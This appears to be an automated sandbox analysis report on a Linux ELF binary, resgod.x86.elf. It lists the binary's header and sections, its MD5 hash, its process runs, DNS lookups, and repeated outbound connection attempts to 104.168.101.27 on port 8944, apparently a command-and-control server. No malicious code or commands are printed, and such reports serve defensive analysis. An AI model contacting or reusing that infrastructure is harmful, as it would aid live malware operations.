                                            File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@...............................................P.......P.....p.......(...............Q.td....................................................H...._........H........

                                            ELF header

                                            Class:ELF64
                                            Data:2's complement, little endian
                                            Version:1 (current)
                                            Machine:Advanced Micro Devices X86-64
                                            Version Number:0x1
                                            Type:EXEC (Executable file)
                                            OS/ABI:UNIX - System V
                                            ABI Version:0
                                            Entry Point Address:0x400194
                                            Flags:0x0
                                            ELF Header Size:64
                                            Program Header Offset:64
                                            Program Header Size:56
                                            Number of Program Headers:3
                                            Section Header Offset:58544
                                            Section Header Size:64
                                            Number of Section Headers:10
                                            Header String Table Index:9
                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                            NULL0x00x00x00x00x0000
                                            .initPROGBITS0x4000e80xe80x130x00x6AX001
                                            .textPROGBITS0x4001000x1000xb8060x00x6AX0016
                                            .finiPROGBITS0x40b9060xb9060xe0x00x6AX001
                                            .rodataPROGBITS0x40b9200xb9200x22f00x00x2A0032
                                            .ctorsPROGBITS0x50e0000xe0000x100x00x3WA008
                                            .dtorsPROGBITS0x50e0100xe0100x100x00x3WA008
                                            .dataPROGBITS0x50e0400xe0400x4300x00x3WA0032
                                            .bssNOBITS0x50e4800xe4700x29a80x00x3WA0032
                                            .shstrtabSTRTAB0x00xe4700x3e0x00x0001
                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                            LOAD0x00x4000000x4000000xdc100xdc106.54700x5R E0x100000.init .text .fini .rodata
                                            LOAD0xe0000x50e0000x50e0000x4700x2e282.08350x6RW 0x100000.ctors .dtors .data .bss
                                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x8

                                            Download Network PCAP: filteredfull

                                            • Total Packets: 26
                                            • 8944 undefined
                                            • 53 (DNS)
                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 20, 2025 08:17:32.827790022 CET593648944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:17:33.830986023 CET593648944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:17:35.846930027 CET593648944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:17:40.071042061 CET593648944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:17:48.262964010 CET593648944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:18:04.390989065 CET593648944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:18:37.670968056 CET593648944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:19:43.208806038 CET593668944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:19:44.230828047 CET593668944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:19:46.246747017 CET593668944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:19:50.374773979 CET593668944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:19:58.566768885 CET593668944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:20:14.694808960 CET593668944192.168.2.13104.168.101.27
                                            Mar 20, 2025 08:20:48.742657900 CET593668944192.168.2.13104.168.101.27
                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 20, 2025 08:20:17.098084927 CET5735353192.168.2.131.1.1.1
                                            Mar 20, 2025 08:20:17.098084927 CET5299353192.168.2.131.1.1.1
                                            Mar 20, 2025 08:20:22.102946997 CET4536953192.168.2.138.8.8.8
                                            Mar 20, 2025 08:20:22.102957010 CET5735353192.168.2.131.1.1.1
                                            Mar 20, 2025 08:20:27.344005108 CET4536953192.168.2.138.8.8.8
                                            Mar 20, 2025 08:20:27.344014883 CET5735353192.168.2.131.1.1.1
                                            Mar 20, 2025 08:20:32.594172955 CET4536953192.168.2.138.8.8.8
                                            Mar 20, 2025 08:20:32.594181061 CET5735353192.168.2.131.1.1.1
                                            Mar 20, 2025 08:20:37.843904972 CET4536953192.168.2.138.8.8.8
                                            Mar 20, 2025 08:20:37.844084978 CET5735353192.168.2.131.1.1.1
                                            Mar 20, 2025 08:20:43.093919039 CET4536953192.168.2.138.8.8.8
                                            Mar 20, 2025 08:20:43.094046116 CET5735353192.168.2.131.1.1.1
                                            Mar 20, 2025 08:20:43.183912992 CET53453698.8.8.8192.168.2.13
                                            Mar 20, 2025 08:20:43.193397045 CET53573531.1.1.1192.168.2.13
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Mar 20, 2025 08:20:17.098084927 CET192.168.2.131.1.1.10x772aStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                            Mar 20, 2025 08:20:17.098084927 CET192.168.2.131.1.1.10xf269Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                            Mar 20, 2025 08:20:22.102946997 CET192.168.2.138.8.8.80xf269Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                            Mar 20, 2025 08:20:22.102957010 CET192.168.2.131.1.1.10x772aStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                            Mar 20, 2025 08:20:27.344005108 CET192.168.2.138.8.8.80xf269Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                            Mar 20, 2025 08:20:27.344014883 CET192.168.2.131.1.1.10x772aStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                            Mar 20, 2025 08:20:32.594172955 CET192.168.2.138.8.8.80xf269Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                            Mar 20, 2025 08:20:32.594181061 CET192.168.2.131.1.1.10x772aStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                            Mar 20, 2025 08:20:37.843904972 CET192.168.2.138.8.8.80xf269Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                            Mar 20, 2025 08:20:37.844084978 CET192.168.2.131.1.1.10x772aStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                            Mar 20, 2025 08:20:43.093919039 CET192.168.2.138.8.8.80xf269Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                            Mar 20, 2025 08:20:43.094046116 CET192.168.2.131.1.1.10x772aStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Mar 20, 2025 08:20:43.193397045 CET1.1.1.1192.168.2.130x772aNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                            Mar 20, 2025 08:20:43.193397045 CET1.1.1.1192.168.2.130x772aNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                                            System Behavior

                                            Start time (UTC):07:17:31
                                            Start date (UTC):20/03/2025
                                            Path:/tmp/resgod.x86.elf
                                            Arguments:/tmp/resgod.x86.elf
                                            File size:59184 bytes
                                            MD5 hash:f8bb50cbdd59e1d73e742e209bfe03b0

                                            Start time (UTC):07:17:31
                                            Start date (UTC):20/03/2025
                                            Path:/tmp/resgod.x86.elf
                                            Arguments:-
                                            File size:59184 bytes
                                            MD5 hash:f8bb50cbdd59e1d73e742e209bfe03b0

                                            Start time (UTC):07:17:31
                                            Start date (UTC):20/03/2025
                                            Path:/tmp/resgod.x86.elf
                                            Arguments:-
                                            File size:59184 bytes
                                            MD5 hash:f8bb50cbdd59e1d73e742e209bfe03b0